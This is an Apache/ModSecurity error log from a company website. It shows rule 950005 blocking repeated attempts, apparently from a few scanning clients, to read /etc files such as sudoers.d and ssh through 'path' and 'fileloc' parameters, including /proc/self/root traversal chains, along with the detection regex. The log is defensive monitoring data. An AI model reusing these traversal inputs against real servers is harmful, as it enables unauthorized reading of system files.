[Fri Mar 20 07:37:39.931328 2026] [:error] [pid 31215:tid 140411540502272] [client 216.73.216.191:49374] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jcwF0L0L-SsrnPo5kSwAAAtg"]
[Fri Mar 20 07:37:40.040177 2026] [:error] [pid 31215:tid 140411725141760] [client 216.73.216.191:7303] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jdAF0L0L-SsrnPo5kTAAAAsI"]
[Fri Mar 20 07:37:40.132170 2026] [:error] [pid 31215:tid 140411616036608] [client 216.73.216.191:49374] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jdAF0L0L-SsrnPo5kTQAAAs8"]
[Fri Mar 20 07:37:40.241941 2026] [:error] [pid 31215:tid 140411674785536] [client 216.73.216.191:7303] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jdAF0L0L-SsrnPo5kTgAAAsg"]
[Fri Mar 20 07:37:40.335553 2026] [:error] [pid 31215:tid 140411649607424] [client 216.73.216.191:49374] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jdAF0L0L-SsrnPo5kTwAAAss"]
[Fri Mar 20 07:37:40.444596 2026] [:error] [pid 31215:tid 140411632822016] [client 216.73.216.191:7303] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jdAF0L0L-SsrnPo5kUAAAAs0"]
[Fri Mar 20 07:37:40.535657 2026] [:error] [pid 31215:tid 140411658000128] [client 216.73.216.191:49374] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jdAF0L0L-SsrnPo5kUQAAAso"]
[Fri Mar 20 07:37:40.645937 2026] [:error] [pid 31215:tid 140411666392832] [client 216.73.216.191:7303] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jdAF0L0L-SsrnPo5kUgAAAsk"]
[Fri Mar 20 07:37:40.904391 2026] [:error] [pid 31215:tid 140411590858496] [client 216.73.216.191:49374] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jdAF0L0L-SsrnPo5kUwAAAtI"]
[Fri Mar 20 07:37:40.916647 2026] [:error] [pid 9818:tid 140411658000128] [client 216.73.216.191:15636] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jdF1pVZ5mVmJwsFMrqAAAAEo"]
[Fri Mar 20 07:37:40.950523 2026] [:error] [pid 31215:tid 140411582465792] [client 216.73.216.191:7303] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jdAF0L0L-SsrnPo5kVAAAAtM"]
[Fri Mar 20 07:37:41.040846 2026] [:error] [pid 9818:tid 140411666392832] [client 216.73.216.191:25825] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jdV1pVZ5mVmJwsFMrqQAAAEk"]
[Fri Mar 20 07:37:41.155409 2026] [:error] [pid 31215:tid 140411548894976] [client 216.73.216.191:7303] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/networkmanager"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jdQF0L0L-SsrnPo5kVQAAAtc"]
[Fri Mar 20 07:37:51.146966 2026] [:error] [pid 21219:tid 140411691570944] [client 74.7.243.128:54776] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0jf_XLqtnMIWvjpaKWBQAAAoY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:38:17.432069 2026] [:error] [pid 11642:tid 140411540502272] [client 216.73.216.191:44954] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/etc/gmt 12"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0jmbninkcc-iUj5ApakAAAA5g"]
[Fri Mar 20 07:38:20.997112 2026] [mime_magic:error] [pid 11642:tid 140411716749056] (70014)End of file found: [client 216.73.216.191:45212] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:38:29.549977 2026] [:error] [pid 9818:tid 140411658000128] [client 74.7.241.31:49252] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0jpV1pVZ5mVmJwsFMsBAAAAEo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/var/run/initramfs/state/etc
[Fri Mar 20 07:38:34.238930 2026] [:error] [pid 11642:tid 140411641214720] [client 216.73.216.191:59993] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dir_colors.256color"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jqrninkcc-iUj5ApaqAAAA4w"]
[Fri Mar 20 07:38:34.290067 2026] [:error] [pid 7235:tid 140411716749056] [client 216.73.216.191:26717] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/grafana-agent.yaml"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jqvqxLDW4GITHUkTinQAAAQM"]
[Fri Mar 20 07:38:34.373151 2026] [:error] [pid 11642:tid 140411548894976] [client 216.73.216.191:59993] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/exports"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jqrninkcc-iUj5ApaqQAAA5c"]
[Fri Mar 20 07:38:34.414683 2026] [:error] [pid 9818:tid 140411632822016] [client 216.73.216.191:52425] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sestatus.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jql1pVZ5mVmJwsFMsCwAAAE0"]
[Fri Mar 20 07:38:34.415681 2026] [:error] [pid 7235:tid 140411733534464] [client 216.73.216.191:26717] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dir_colors.lightbgcolor"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jqvqxLDW4GITHUkTingAAAQE"]
[Fri Mar 20 07:38:34.438068 2026] [:error] [pid 10189:tid 140411716749056] [client 216.73.216.191:14937] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sysctl.conf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jqjJ3M9BSuKP7CAYWjwAAAIM"]
[Fri Mar 20 07:38:34.484760 2026] [:error] [pid 11642:tid 140411582465792] [client 216.73.216.191:4970] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dnsmasq.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jqrninkcc-iUj5ApaqgAAA5M"]
[Fri Mar 20 07:38:35.107634 2026] [:error] [pid 11167:tid 140411691570944] [client 216.73.216.191:59706] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/centos-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jq_HIg5MgXLBnicPz0QAAAcY"]
[Fri Mar 20 07:38:35.206846 2026] [:error] [pid 15826:tid 140411607643904] [client 216.73.216.191:3607] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/odbcinst.ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jq-oXxyEfFpUF8f99TAAAAVA"]
[Fri Mar 20 07:38:35.240636 2026] [:error] [pid 11167:tid 140411590858496] [client 216.73.216.191:59706] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/xinetd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jq_HIg5MgXLBnicPz0gAAAdI"]
[Fri Mar 20 07:38:35.291060 2026] [:error] [pid 9818:tid 140411616036608] [client 216.73.216.191:12263] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/os-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jq11pVZ5mVmJwsFMsDQAAAE8"]
[Fri Mar 20 07:38:35.318983 2026] [:error] [pid 26799:tid 140411590858496] [client 216.73.216.191:50274] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/netconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jq9a6ubjKNq_cu4bQOAAAA1I"]
